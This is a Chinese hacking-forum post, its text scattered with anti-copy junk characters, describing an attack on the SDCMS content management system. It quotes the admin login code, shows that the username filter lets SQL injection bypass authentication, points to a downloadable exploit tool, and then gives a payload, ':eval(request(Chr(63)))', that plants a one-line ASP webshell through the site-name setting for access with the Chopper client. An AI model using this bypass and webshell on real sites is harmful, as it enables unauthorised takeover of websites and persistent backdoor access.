作者:T00LS 鬼哥
/ u, `: V9 \; \5 g! ~; W$ O漏洞文件:后台目录/index.asp
8 n6 i7 C+ X5 |% D+ i0 m8 l
* w# j2 n$ A, O+ V# z' B% WSub Check
+ X# ` ~# ?, K3 } Dim username,password,code,getcode,Rs: s- [. w2 Y9 Q3 l; x+ ?" N
IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub: E9 ~1 h% N( t
username=FilterText(Trim(Request.Form("username")),1)/ ?' O9 Z* ?7 B7 s P
password=FilterText(Trim(Request.Form("password")),1)
/ n" k$ [6 G7 J code=Trim(Request.Form("yzm"))
9 G m2 B m- h& U; S9 \ getcode=Session("SDCMSCode"); s+ ~4 I6 {# }1 t n' J$ U. E
IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died
7 @) N) L- S6 Y4 M- V IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)"ied
9 L" m6 l+ E2 B: n IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)"ied
8 k. ]5 W7 h& f+ t2 i2 h) F IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)"ied' E, m) w: ]( V" ?
IF username="" or password="" Then. W5 A1 u7 C% Y1 l7 t+ {
Echo "用户名或密码不能为空"ied
: U( s1 p# z9 {& R Else" N( s; \# T' w* }
Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")# \! z2 q4 f' x, M+ g- r& E" ~
IF Rs.Eof Then1 n* x7 G+ I- r
AddLog username,GetIp,"登录失败",1% {0 o3 M% i# F: S+ s
Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会"4 g# Q( K5 q; {2 J
Else* I& O) F* n3 b
Add_Cookies "sdcms_id",Rs(0)
) ~5 B! r& d, ^- k' p# s) v Add_Cookies "sdcms_name",username4 `( {+ q$ L% c. x- q- i9 G4 r
Add_Cookies "sdcms_pwd",Rs(2)- [3 j% T! V% z/ m7 U1 w ?8 \
Add_Cookies "sdcms_admin",Rs(3)7 r2 c; w0 E* j$ f& b
Add_Cookies "sdcms_alllever",Rs(4)
1 r. D0 G/ H, {0 q Add_Cookies "sdcms_infolever",Rs(5)5 A- O1 B6 z3 t: S" q( z3 H* L2 @
Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&""); I- `# W, }, x5 Q
AddLog username,GetIp,"登录成功",1
8 P$ I6 Z" F5 D1 @% v' W '自动删除30天前的Log记录
+ X) w% g# T5 ~& q' R6 f4 a! M IF Sdcms_DataType Then. m+ W- G) u' k0 |- f- M3 `5 b
Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")
( ^; R/ h% b. a9 b5 o& ^ Else e- g! w5 U' {% _$ R/ d% a! u
Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30")
2 C$ J9 ]# M8 V0 W8 p, U+ r End IF
! T" M" ?7 @ n# m Go("sdcms_index.asp")
8 t5 |1 `- j; B. B) U' [ End IF% G* ~+ M. e5 E6 s: r& ]
Rs.Close, ] D' T s* b
Set Rs=Nothing
. o* F8 f& J. x4 t7 `/ T) ?! l End IF6 P1 \ d: Q* j6 I
End Sub
' M7 Y0 D8 s/ ~ y1 d0 H. s
: T0 q0 A: I+ ?& T9 a/ s% E1 r’我们可以看到username是通过FilterText来过滤的。我们看看FilterText的代码" u5 w9 z, |4 _6 K" B( K8 |2 |5 H7 \
( [6 R& ~5 m2 M1 c8 y/ S5 o6 oFunction FilterText(ByVal t0,ByVal t1)6 G5 l( o3 c$ J3 J1 D! a+ y
IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function
: Y( C0 Y: p3 A5 q9 F9 y# h$ o t0=Trim(t0)
# R: p1 W! M: P% Z5 y4 u Select Case t1
2 Y, }5 Q8 {+ }. d) T! k3 p4 A Case "1"
/ L. v( q1 T% i9 Z, P2 G C- J t0=Replace(t0,Chr(32),"")! [7 m1 f+ _0 h# m" d3 h
t0=Replace(t0,Chr(13),"")- Z4 q* X& w& ]4 r8 {1 d
t0=Replace(t0,Chr(10)&Chr(10),"")
. J7 J! H# ]1 B, M t0=Replace(t0,Chr(10),"")
( s& [, u% v6 I) E3 r Case "2": M$ `" [& y# F9 A; X9 x
t0=Replace(t0,Chr(8),"")'回格' S, V; P& t: m0 V W2 s
t0=Replace(t0,Chr(9),"")'tab(水平制表符)
1 F8 \9 W' V/ v6 n X8 ]0 N4 Q t0=Replace(t0,Chr(10),"")'换行
7 [+ U- K4 S F3 U, e2 w t0=Replace(t0,Chr(11),"")'tab(垂直制表符)1 k% D5 R9 n- ]
t0=Replace(t0,Chr(12),"")'换页
) I* Q2 Z) V Y7 f5 h: e' V t0=Replace(t0,Chr(13),"")'回车 chr(13)&chr(10) 回车和换行的组合
3 m9 L! l1 i, |5 E' h t0=Replace(t0,Chr(22),"")
+ E0 V9 C7 ~# F8 p9 q: c) e t0=Replace(t0,Chr(32),"")'空格 SPACE
$ D9 Q; i! k% \ t0=Replace(t0,Chr(33),"")'!
9 j* g. y# p S: E6 M9 e0 C t0=Replace(t0,Chr(34),"")'"
0 }4 `2 v# L% j+ W E* C1 ~9 s$ P. A t0=Replace(t0,Chr(35),"")'#
s1 Z% G3 y# Z t0=Replace(t0,Chr(36),"")'$& ?; _: i8 t7 f
t0=Replace(t0,Chr(37),"")'%0 K( U3 ~& x' ?9 I
t0=Replace(t0,Chr(38),"")'&
3 T& ^- d ~* Q( o# u t0=Replace(t0,Chr(39),"")''& F: I0 @( {% a/ r3 b+ o$ I
t0=Replace(t0,Chr(40),"")'(
" V/ ]$ }" _# e# U7 n8 i t0=Replace(t0,Chr(41),"")')7 `# r ?1 t; j( h
t0=Replace(t0,Chr(42),"")'*9 p1 i+ x* t1 j, `& b
t0=Replace(t0,Chr(43),"")'+
7 y; l J! M- [2 C( O( g t0=Replace(t0,Chr(44),"")',
) C, I- k* F- Y* J. h+ |4 h" w t0=Replace(t0,Chr(45),"")'-# `. i$ m. ]9 W" m$ [
t0=Replace(t0,Chr(46),"")'.
( F" ~2 q- m }4 X# }( g t0=Replace(t0,Chr(47),"")'/
( t6 G. H2 U; p( D7 `" `6 V. Q3 \5 s5 | t0=Replace(t0,Chr(58),"")':
: v' [* V* Z- i+ E4 o7 X t0=Replace(t0,Chr(59),"")';
/ Z* @7 A5 l3 s) l- s$ m- h/ B" A3 N t0=Replace(t0,Chr(60),"")'< t0=Replace(t0,Chr(61),"")'= t0=Replace(t0,Chr(62),"")'>
7 m/ v- l6 w0 R: F t0=Replace(t0,Chr(63),"")'?/ V" m3 c; f. w h6 q1 s; B. U0 T+ t* {
t0=Replace(t0,Chr(64),"")'@( y' V+ t! ~2 z, a
t0=Replace(t0,Chr(91),"")'\
1 m* b' E, _* h) G1 G/ { t0=Replace(t0,Chr(92),"")'\2 _5 Q1 r& ^& N% U7 T* v8 y1 d6 a
t0=Replace(t0,Chr(93),"")']
. u2 y& y t/ l3 k3 N$ h0 P t0=Replace(t0,Chr(94),"")'^
0 U' B: o( Z9 g" {8 U0 G t0=Replace(t0,Chr(95),"")'_, ~, x! R! {2 P; q' U- `8 E
t0=Replace(t0,Chr(96),"")'`$ ^* u4 a2 ~" i4 B" ?% \8 e9 o. @
t0=Replace(t0,Chr(123),"")'{
% Q8 x8 }! f5 v# a" @ t0=Replace(t0,Chr(124),"")'|0 X6 }' O6 @* C* e0 q6 k
t0=Replace(t0,Chr(125),"")'}
3 o( u* G. x% n t0=Replace(t0,Chr(126),"")'~
+ Q+ s6 ]8 f, M% G) h, L$ ] Case Else5 P8 m* C0 g9 Q4 D
t0=Replace(t0, "&", "&")
6 {5 U: M5 ^( j6 K* Q+ e& b t0=Replace(t0, "'", "'")
0 G* y: d0 c0 b7 @6 `( Q, D/ I& F t0=Replace(t0, """", """): h; g( F5 R: k3 R" \3 j. G
t0=Replace(t0, "<", "<") t0=Replace(t0, ">", ">")
0 P v. ?5 A; V* L m End Select
! r+ @ V4 v [& R; K IF Instr(Lcase(t0),"expression")>0 Then
) p9 }. J8 ]: g) { t0=Replace(t0,"expression","e­xpression", 1, -1, 0)
, Y+ ^1 K! ]4 P1 Y End If
7 ]0 h; `1 p' V+ f* R" B FilterText=t0
! A7 W; P* B7 ^ tEnd Function
, p7 f! e* m+ ]( f7 ?/ L; ^& E' e/ z6 M; N2 @% E" i
看到没。直接参数是1 只过滤
9 |/ {) @ P7 O* a8 k J t0=Replace(t0,Chr(32)," ")8 l8 J: r$ M2 G) n6 M
t0=Replace(t0,Chr(13),"")
: k+ h) t1 i; P! U+ { a/ t5 @& }7 Z t0=Replace(t0,Chr(10)&Chr(10),"8 d( z4 R8 r0 o" W( f6 Q1 x
")0 h3 P Q5 Q2 x6 E
t0=Replace(t0,Chr(10),"
$ j7 X9 Z7 a6 Y")- `8 S8 w |/ B; D
漏洞导致可以直接拿到后台帐号密码。SDCMS默认后台地址/admin/如果站长改了后台路径,那么请自行查找!
* q4 g( x, Q4 d# ], A! jEXP利用工具下载 (此工具只能在XP上运行):sdcms-EXP/ K" G) s0 J* @% ]& I" j# k' S5 e
+ j9 ~, k8 z6 _: R% ^测试:' b2 X; h6 P9 F! T
9 c; [; s) ?) ~2 P
0 `9 F2 h1 S: P9 R3 L现在输入工具上验证码,然后点OK& K9 ? c$ ~6 W5 r
( W; Q* N1 ~- T. e1 K/ t
: n) N5 k4 E6 k) n# [看到我们直接进入后台管理界面了,呵呵!
' Y4 B8 h9 v2 a" m( P
' `" Y% W5 I- \4 A1 f! h' ]/ o" C& ], I" m
- u, p& ~ u) b t
这样直接进入后台了。。。。
1 c/ c& Y6 Y7 D' _6 X) @
( g' g3 w* e$ D) Z . p9 C4 l" ]1 ]& K) V
& D* y1 P- N8 q& q
SDCMS提权:
' p- ?1 [4 Q. B- \0 y
}) k- H* a1 _4 b' F方法1:访问:/后台目录/sdcms_set.asp 在 网站名称:后面加个 “:eval(request(Chr(63)))’ 即可,直接写一句话进去。 写入到/inc/Const.asp 一句话连接密码是?
2 B2 n' R; p- O2 P" I3 V" A2 ~+ K9 a* f; t" j
8 S6 r7 Z1 }0 R7 W8 K
' u2 ~3 [& l- N0 T qOK,现在用菜刀连接下!$ E& ^6 k, }( h( B. ^% F5 k
. j; ~$ |' \- s9 z+ c: N5 p& k- T% K$ }+ k+ W5 W
" R/ a' ~: | E; a7 \ D
" F E- J$ W. }0 G8 `9 e
3 |7 l8 |, L/ z7 n1 i- q$ Z |